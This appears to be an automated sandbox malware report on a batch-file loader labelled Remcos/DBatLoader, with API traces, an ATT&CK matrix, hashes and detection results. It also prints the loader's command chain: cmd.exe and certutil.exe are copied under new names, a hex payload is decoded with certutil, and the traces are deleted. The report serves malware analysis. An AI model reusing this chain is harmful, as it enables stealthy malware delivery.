Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF7FD85511C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1963FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF6EB1963FC
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB18823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6EB18823C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6EB188FA4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB1893B0 SetUnhandledExceptionFilter,4_2_00007FF6EB1893B0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF6EB188FA4
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6EB1893B0 SetUnhandledExceptionFilter,6_2_00007FF6EB1893B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8A53E0 SetUnhandledExceptionFilter,7_2_00007FF7FD8A53E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8A4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7FD8A4E18
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF6EB188FA4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF6EB1893B0 SetUnhandledExceptionFilter,10_2_00007FF6EB1893B0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB188FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF6EB188FA4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6EB1893B0 SetUnhandledExceptionFilter,11_2_00007FF6EB1893B0

HIPS / PFW / Operating System Protection Evasion

barindex
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD857024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF7FD857024
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 Jump to behavior
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD8872B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,7_2_00007FF7FD8872B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD854E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,7_2_00007FF7FD854E98
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF6EB1851EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF6EB183140
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF6EB1851EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF6EB183140
Source: C:\Users\Public\kn.exeCode function: LoadLibraryW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF7FD8A3800
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF6EB1851EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF6EB183140
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF6EB1851EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF6EB176EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF6EB183140
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB198654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF6EB198654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD88BEE8 LookupAccountNameW,GetLastError,GetLastError,#357,LocalAlloc,LocalAlloc,#357,LookupAccountNameW,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF7FD88BEE8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6EB17586C GetVersion,4_2_00007FF6EB17586C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF7FD7D5648
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF7FD7B54A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF7FD7CE568
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF7FD7B227C

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts		Windows Management Instrumentation2
Valid Accounts		2
Valid Accounts		111
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services11
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		21
Access Token Manipulation		2
Valid Accounts		LSASS Memory2
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Process Injection		2
Disable or Modify Tools		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		21
Access Token Manipulation		NTDS1
System Owner/User Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials25
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Install Root Certificate		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Timestomp		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
DLL Side-Loading		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483432 Sample: Xirnkxhvuzwepe.cmd Startdate: 27/07/2024 Architecture: WINDOWS Score: 72 31 Multi AV Scanner detection for submitted file 2->31 33 Sigma detected: Execution from Suspicious Folder 2->33 35 Sigma detected: Parent in Public Folder Suspicious Process 2->35 7 cmd.exe 1 2->7         started        process3 process4 9 extrac32.exe 1 7->9         started        13 alpha.exe 1 7->13         started        15 alpha.exe 1 7->15         started        17 4 other processes 7->17 file5 29 C:\Users\Public\alpha.exe, PE32+ 9->29 dropped 39 Drops PE files to the user root directory 9->39 41 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 9->41 43 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 9->43 19 kn.exe 3 2 13->19         started        22 extrac32.exe 1 15->22         started        25 kn.exe 1 17->25         started        signatures6 process7 file8 37 Registers a new ROOT certificate 19->37 27 C:\Users\Public\kn.exe, PE32+ 22->27 dropped signatures9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Xirnkxhvuzwepe.cmd29%ReversingLabsScript-BAT.Trojan.Remcos
Xirnkxhvuzwepe.cmd12%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\alpha.exe0%ReversingLabs
C:\Users\Public\alpha.exe0%VirustotalBrowse
C:\Users\Public\kn.exe0%ReversingLabs
C:\Users\Public\kn.exe0%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc0%Avira URL Cloudsafe
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP0%Avira URL Cloudsafe
https://login.microsoftonline.com/%s/oauth2/token0%Avira URL Cloudsafe
https://login.microsoftonline.com/%s/oauth2/authorize0%Avira URL Cloudsafe
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah0%Avira URL Cloudsafe
https://%ws/%ws_%ws_%ws/service.svc/%ws0%Avira URL Cloudsafe
https://enterpriseregistration.windows.net/EnrollmentServer/device/0%Avira URL Cloudsafe
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah0%VirustotalBrowse
https://enterpriseregistration.windows.net/EnrollmentServer/key/0%Avira URL Cloudsafe
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc0%VirustotalBrowse
https://enterpriseregistration.windows.net/EnrollmentServer/device/0%VirustotalBrowse
https://login.microsoftonline.com/%s/oauth2/token0%VirustotalBrowse
https://login.microsoftonline.com/%s/oauth2/authorize0%VirustotalBrowse
https://enterpriseregistration.windows.net/EnrollmentServer/key/0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
  • Avira URL Cloud: safe
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000007.00000000.1998811698.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.2001223105.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.2005831412.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.2006855083.00007FF7FD8AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
  • Avira URL Cloud: safe
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1483432
Start date and time:2024-07-27 13:28:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 42s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Xirnkxhvuzwepe.cmd
Detection:MAL
Classification:mal72.bank.evad.winCMD@20/10@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 58
  • Number of non-executed functions: 213
Cookbook Comments:
  • Found application associated with file extension: .cmd
  • Stop behavior analysis, all processes terminated

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Users\Public\alpha.exemegerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
    Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exeGet hashmaliciousRemcos, DBatLoaderBrowse
      Payroll for July.exeGet hashmaliciousRemcos, DBatLoaderBrowse
        2nd_Quarter_Order_Sheet_xls_0000000000000000000.exeGet hashmaliciousRemcos, DBatLoaderBrowse
          Import_Tax Invoice_PL_xls_0000000000000000000 .exeGet hashmaliciousRemcos, DBatLoaderBrowse
            Quotation .exeGet hashmaliciousRemcos, DBatLoaderBrowse
              Request Quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                MT103 BANK ERROR.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  M7RrbN4DTk.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                    Request for quotation.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                      C:\Users\Public\kn.exemegerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                        IAENMAIL-A4-240717-0830-0000909_PDF.cmdGet hashmaliciousDBatLoaderBrowse
                          payment_confirmation.batGet hashmaliciousRemcos, DBatLoaderBrowse
                            Uplata_391.cmdGet hashmaliciousDBatLoaderBrowse
                              PO-MISA-32493.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                PURCHASE_ORDER.CMDGet hashmaliciousDBatLoader, RemcosBrowse
                                  ProofOfPayment.CMDGet hashmaliciousDBatLoader, Neshta, RemcosBrowse
                                    ProofOfPayment.CMDGet hashmaliciousDBatLoader, Neshta, RemcosBrowse
                                      proof.cmdGet hashmaliciousDBatLoader, RemcosBrowse
                                        SWIFT_COPY20240604.cmdGet hashmaliciousDBatLoaderBrowse

                                          Created / dropped Files

                                          C:\Users\Public\CLEAN.GIF

                                          Download File
                                          Process:C:\Users\Public\kn.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):2120706
                                          Entropy (8bit):3.850601544644915
                                          Encrypted:false
                                          SSDEEP:24576:ytsZrhsYd5rWni2+0IOtg91Zq81Ma/PcVbXwITeWjI40FknOnNUk2dd9:Y
                                          MD5:B5D3858CA38D7C4F624618C92AEBE879
                                          SHA1:925649D940266D6EDC2C239C112CF6719E5A83F7
                                          SHA-256:C02463D1E9A27516F8FC3D0866C0188CD63FD6496CAB7089F6E5469EB5555905
                                          SHA-512:4731386DA453D75D0E236582A7E7339474C5BDD2EF6243EE9AF59719AFDC1470EA0ABA438C12373A482B11D3C820DBBF20D167BE59FE3C1D24080F1F9CA21E5B
                                          Malicious:false
                                          Reputation:low
                                          Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900e20600004809000000000000f4060000100000000007000000400000100000000200000400000000000000040000000000000000c01000000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000500e003a26000000100f0000a201000000000000000000000000000000000000a00e00846a000000000000000000000000000000000000000000000000000000900e00180000000000000000000000000000000000000008570e00f00500000000000000000000000000000000000000000000

                                          C:\Users\Public\alpha.exe

                                          Download File
                                          Process:C:\Windows\System32\extrac32.exe
                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                          Category:modified
                                          Size (bytes):289792
                                          Entropy (8bit):6.135598950357573
                                          Encrypted:false
                                          SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                          MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                          SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                          SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Joe Sandbox View:
                                          • Filename: megerosites.cmd, Detection: malicious, Browse
                                          • Filename: Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe, Detection: malicious, Browse
                                          • Filename: Payroll for July.exe, Detection: malicious, Browse
                                          • Filename: 2nd_Quarter_Order_Sheet_xls_0000000000000000000.exe, Detection: malicious, Browse
                                          • Filename: Import_Tax Invoice_PL_xls_0000000000000000000 .exe, Detection: malicious, Browse
                                          • Filename: Quotation .exe, Detection: malicious, Browse
                                          • Filename: Request Quotation.exe, Detection: malicious, Browse
                                          • Filename: MT103 BANK ERROR.PDF.exe, Detection: malicious, Browse
                                          • Filename: M7RrbN4DTk.exe, Detection: malicious, Browse
                                          • Filename: Request for quotation.exe, Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                          C:\Users\Public\kn.exe

                                          Download File
                                          Process:C:\Windows\System32\extrac32.exe
                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                          Category:modified
                                          Size (bytes):1651712
                                          Entropy (8bit):6.144018815244304
                                          Encrypted:false
                                          SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                          MD5:F17616EC0522FC5633151F7CAA278CAA
                                          SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                          SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                          SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Joe Sandbox View:
                                          • Filename: megerosites.cmd, Detection: malicious, Browse
                                          • Filename: IAENMAIL-A4-240717-0830-0000909_PDF.cmd, Detection: malicious, Browse
                                          • Filename: payment_confirmation.bat, Detection: malicious, Browse
                                          • Filename: Uplata_391.cmd, Detection: malicious, Browse
                                          • Filename: PO-MISA-32493.cmd, Detection: malicious, Browse
                                          • Filename: PURCHASE_ORDER.CMD, Detection: malicious, Browse
                                          • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                          • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                          • Filename: proof.cmd, Detection: malicious, Browse
                                          • Filename: SWIFT_COPY20240604.cmd, Detection: malicious, Browse
